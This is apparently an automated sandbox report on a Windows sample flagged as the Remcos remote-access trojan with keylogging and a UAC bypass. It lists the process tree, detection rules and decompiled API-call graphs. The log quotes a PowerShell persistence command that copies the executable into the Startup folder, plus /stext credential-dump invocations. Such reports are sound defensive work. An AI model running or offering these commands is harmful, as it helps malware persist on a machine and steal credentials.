                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:19:54:53
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\FAT6789098700900.scr.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\FAT6789098700900.scr.exe"
                                                                                                                                                                                                                            Imagebase:0x480000
                                                                                                                                                                                                                            File size:877'056 bytes
                                                                                                                                                                                                                            MD5 hash:B7B504EA022610FE69940FD54FD2BC27
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4129439610.0000000003BC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.4129439610.0000000003BC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.4129439610.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                            Start time:19:54:54
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'
                                                                                                                                                                                                                            Imagebase:0x5b0000
                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:19:54:54
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:19:54:55
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\FAT6789098700900.scr.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\FAT6789098700900.scr.exe"
                                                                                                                                                                                                                            Imagebase:0x3f0000
                                                                                                                                                                                                                            File size:877'056 bytes
                                                                                                                                                                                                                            MD5 hash:B7B504EA022610FE69940FD54FD2BC27
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                            Start time:19:54:55
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                            Start time:19:54:56
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 512
                                                                                                                                                                                                                            Imagebase:0xf10000
                                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                            Start time:19:55:07
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"
                                                                                                                                                                                                                            Imagebase:0x310000
                                                                                                                                                                                                                            File size:877'056 bytes
                                                                                                                                                                                                                            MD5 hash:B7B504EA022610FE69940FD54FD2BC27
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.4129081152.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                            • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                            • Detection: 63%, Virustotal, Browse
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                            Start time:19:55:07
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'
                                                                                                                                                                                                                            Imagebase:0x5b0000
                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                            Start time:19:55:07
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                            Start time:19:55:08
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"
                                                                                                                                                                                                                            Imagebase:0xdf0000
                                                                                                                                                                                                                            File size:877'056 bytes
                                                                                                                                                                                                                            MD5 hash:B7B504EA022610FE69940FD54FD2BC27
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4123803181.0000000000466000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4126585054.000000000307F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4125168442.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4125168442.000000000151A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4125168442.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.4123803181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                            Start time:19:55:12
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\yvbpfnx"
                                                                                                                                                                                                                            Imagebase:0x8e0000
                                                                                                                                                                                                                            File size:877'056 bytes
                                                                                                                                                                                                                            MD5 hash:B7B504EA022610FE69940FD54FD2BC27
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                            Start time:19:55:12
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc"
                                                                                                                                                                                                                            Imagebase:0x410000
                                                                                                                                                                                                                            File size:877'056 bytes
                                                                                                                                                                                                                            MD5 hash:B7B504EA022610FE69940FD54FD2BC27
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                            Start time:19:55:12
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc"
                                                                                                                                                                                                                            Imagebase:0x350000
                                                                                                                                                                                                                            File size:877'056 bytes
                                                                                                                                                                                                                            MD5 hash:B7B504EA022610FE69940FD54FD2BC27
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                            Start time:19:55:12
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc"
                                                                                                                                                                                                                            Imagebase:0xc60000
                                                                                                                                                                                                                            File size:877'056 bytes
                                                                                                                                                                                                                            MD5 hash:B7B504EA022610FE69940FD54FD2BC27
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                            Start time:19:55:12
                                                                                                                                                                                                                            Start date:02/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\lrtshyspzluife"
                                                                                                                                                                                                                            Imagebase:0xb00000
                                                                                                                                                                                                                            File size:877'056 bytes
                                                                                                                                                                                                                            MD5 hash:B7B504EA022610FE69940FD54FD2BC27
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:7%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                              Signature Coverage:2.7%
                                                                                                                                                                                                                              Total number of Nodes:113
                                                                                                                                                                                                                              Total number of Limit Nodes:9
                                                                                                                                                                                                                              execution_graph 24496 26b4668 24497 26b467a 24496->24497 24498 26b4686 24497->24498 24502 26b4779 24497->24502 24507 26b3e10 24498->24507 24500 26b46a5 24503 26b479d 24502->24503 24511 26b4878 24503->24511 24515 26b4888 24503->24515 24508 26b3e1b 24507->24508 24523 26b5ca4 24508->24523 24510 26b6fed 24510->24500 24513 26b4888 24511->24513 24512 26b498c 24512->24512 24513->24512 24519 26b4248 24513->24519 24517 26b48af 24515->24517 24516 26b498c 24516->24516 24517->24516 24518 26b4248 CreateActCtxA 24517->24518 24518->24516 24520 26b5918 CreateActCtxA 24519->24520 24522 26b59db 24520->24522 24524 26b5caf 24523->24524 24527 26b5cc4 24524->24527 24526 26b710d 24526->24510 24528 26b5ccf 24527->24528 24531 26b5cf4 24528->24531 24530 26b71e2 24530->24526 24532 26b5cff 24531->24532 24535 26b5d24 24532->24535 24534 26b72e5 24534->24530 24536 26b5d2f 24535->24536 24538 26b85eb 24536->24538 24542 26bac90 24536->24542 24537 26b8629 24537->24534 24538->24537 24546 26bcd81 24538->24546 24551 26bcd90 24538->24551 24556 26bacc8 24542->24556 24559 26bacb7 24542->24559 24543 26baca6 24543->24538 24548 26bcd91 24546->24548 24547 26bcdd5 24547->24537 24548->24547 24568 26bd05f 24548->24568 24572 26bd060 24548->24572 24552 26bcdb1 24551->24552 24553 26bcdd5 24552->24553 24554 26bd05f 3 API calls 24552->24554 24555 26bd060 3 API calls 24552->24555 24553->24537 24554->24553 24555->24553 24563 26badb1 24556->24563 24557 26bacd7 24557->24543 24560 26bacc8 24559->24560 24562 26badb1 GetModuleHandleW 24560->24562 24561 26bacd7 24561->24543 24562->24561 24564 26badf4 24563->24564 24565 26badd1 24563->24565 24564->24557 24565->24564 24566 26baff8 GetModuleHandleW 24565->24566 24567 26bb025 24566->24567 24567->24557 24569 26bd06d 24568->24569 24570 26bd0a7 24569->24570 24576 26bb348 24569->24576 24570->24547 24573 26bd06d 24572->24573 24574 26bd0a7 24573->24574 24575 26bb348 3 API calls 24573->24575 24574->24547 24575->24574 24578 26bb353 24576->24578 24577 26bddc0 24578->24577 24580 26bb42c 24578->24580 24581 26bb437 24580->24581 24582 26b5d24 3 API calls 24581->24582 24583 26bde2f 24582->24583 24584 26bde3e 24583->24584 24587 26bde98 24583->24587 24592 26bdea8 24583->24592 24584->24577 24588 26bde9e 24587->24588 24591 26bde64 24587->24591 24589 26bdfa2 KiUserCallbackDispatcher 24588->24589 24590 26bdfa7 24588->24590 24589->24590 24591->24584 24593 26bded6 24592->24593 24594 26bdfa2 KiUserCallbackDispatcher 24593->24594 24595 26bdfa7 24593->24595 24594->24595 24624 26bd178 24625 26bd1be 24624->24625 24629 26bd358 24625->24629 24632 26bd347 24625->24632 24626 26bd2ab 24636 26bb410 24629->24636 24633 26bd358 24632->24633 24634 26bb410 DuplicateHandle 24633->24634 24635 26bd386 24634->24635 24635->24626 24637 26bd3c0 DuplicateHandle 24636->24637 24638 26bd386 24637->24638 24638->24626 24639 53ef288 DispatchMessageW 24640 53ef2f4 24639->24640 24596 53e6810 24597 53e682a 24596->24597 24600 53e683d 24596->24600 24602 53e55b8 24597->24602 24599 53e6883 24600->24599 24601 53e55b8 OleInitialize 24600->24601 24601->24599 24603 53e55c3 24602->24603 24604 53e68ae 24603->24604 24607 53e68e8 24603->24607 24612 53e68d8 24603->24612 24604->24600 24608 53e6910 24607->24608 24611 53e693c 24607->24611 24609 53e6919 24608->24609 24617 53e5654 24608->24617 24609->24604 24611->24604 24613 53e693c 24612->24613 24614 53e6910 24612->24614 24613->24604 24615 53e6919 24614->24615 24616 53e5654 OleInitialize 24614->24616 24615->24604 24616->24613 24618 53e565f 24617->24618 24619 53e6c33 24618->24619 24621 53e5670 24618->24621 24619->24611 24622 53e6c68 OleInitialize 24621->24622 24623 53e6ccc 24622->24623 24623->24619
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4139468325.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_53e0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e2ae7c3a918ccea463d8c9261648ef5719ed62d0b79e0c689eb52b1aad707104
                                                                                                                                                                                                                              • Instruction ID: 9b41dc726da3a9c13d89354112bf73c3318618e29a4e81b2f030ce3773ca6022
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2ae7c3a918ccea463d8c9261648ef5719ed62d0b79e0c689eb52b1aad707104
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8D15A30A00219CFDB15DFA9C948BADBBF6BF88304F158558E409AF3A5DBB4E945DB40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126782053.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_26b0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5342952588b013614851978a45ac19ac89ad2eff91b14974769e47e539d932f0
                                                                                                                                                                                                                              • Instruction ID: dbabac644f996854a0daf8813b074716aada3f92cce5fab7178bbd1ebb76bd28
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5342952588b013614851978a45ac19ac89ad2eff91b14974769e47e539d932f0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA217F71E01118DBDB0ADFA9D5586EDFBF6EF89300F04A42AE005B7364DB349885CB14

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 317 26badb1-26badcf 318 26badfb-26badff 317->318 319 26badd1-26badde call 26b9d10 317->319 320 26bae13-26bae54 318->320 321 26bae01-26bae0b 318->321 326 26bade0 319->326 327 26badf4 319->327 328 26bae61-26bae6f 320->328 329 26bae56-26bae5e 320->329 321->320 374 26bade6 call 26bb448 326->374 375 26bade6 call 26bb458 326->375 327->318 330 26bae93-26bae95 328->330 331 26bae71-26bae76 328->331 329->328 333 26bae98-26bae9f 330->333 334 26bae78-26bae7f call 26b9d1c 331->334 335 26bae81 331->335 332 26badec-26badee 332->327 336 26baf30-26bafac 332->336 337 26baeac-26baeb3 333->337 338 26baea1-26baea9 333->338 340 26bae83-26bae91 334->340 335->340 367 26bafd8-26baff0 336->367 368 26bafae-26bafd6 336->368 341 26baec0-26baec9 call 26b9d2c 337->341 342 26baeb5-26baebd 337->342 338->337 340->333 348 26baecb-26baed3 341->348 349 26baed6-26baedb 341->349 342->341 348->349 350 26baef9-26baf06 349->350 351 26baedd-26baee4 349->351 357 26baf29-26baf2f 350->357 358 26baf08-26baf26 350->358 351->350 353 26baee6-26baef6 call 26b9d3c call 26b9d4c 351->353 353->350 358->357 369 26baff8-26bb023 GetModuleHandleW 367->369 370 26baff2-26baff5 367->370 368->367 371 26bb02c-26bb040 369->371 372 26bb025-26bb02b 369->372 370->369 372->371 374->332 375->332
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 026BB016
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126782053.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_26b0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                                                              • Opcode ID: b52894d7162a0283e79dd19f2df5461b9a48dfd4759fc60e9dea01ff997f1907
                                                                                                                                                                                                                              • Instruction ID: f5c6dc294997250dd13131c79306223e295fbd7de64b8d1e542a582be6733796
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52894d7162a0283e79dd19f2df5461b9a48dfd4759fc60e9dea01ff997f1907
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95813470A00B458FDB25DF6AD44179ABBF1FF88304F04892ED4869BB50D775E98ACB90

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 376 26b590d-26b59d9 CreateActCtxA 378 26b59db-26b59e1 376->378 379 26b59e2-26b5a3c 376->379 378->379 386 26b5a4b-26b5a4f 379->386 387 26b5a3e-26b5a41 379->387 388 26b5a51-26b5a5d 386->388 389 26b5a60 386->389 387->386 388->389 391 26b5a61 389->391 391->391
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 026B59C9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.4126782053.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_26b0000_FAT6789098700900.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                                                              • Opcode ID: 35d6adffa7107ba2de17b80c3c81568b5d3a11dd99c19481c164bd40c0d2477a
                                                                                                                                                                                                                              • Instruction ID: 7e8ee3f1a5f933afe3260332095965432a1fb05ee540705e87e300cc220a67ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35d6adffa7107ba2de17b80c3c81568b5d3a11dd99c19481c164bd40c0d2477a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F34102B0C00219CEDF24CFA9C8847DDBBB5BF49304F64816AD409AB250DB756989CF50

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 392 26b4248-26b59d9 CreateActCtxA 395 26b59db-26b59e1 392->395 396 26b59e2-26b5a3c 392->396 395->396 403 26b5a4b-26b5a4f 396->403 404 26b5a3e-26b5a41 396->404 405 26b5a51-26b5a5d 403->405 406 26b5a60 403->406 404->403 405->406 408 26b5a61 406->408 408->408
                                                                                                                                                                                                                              APIs
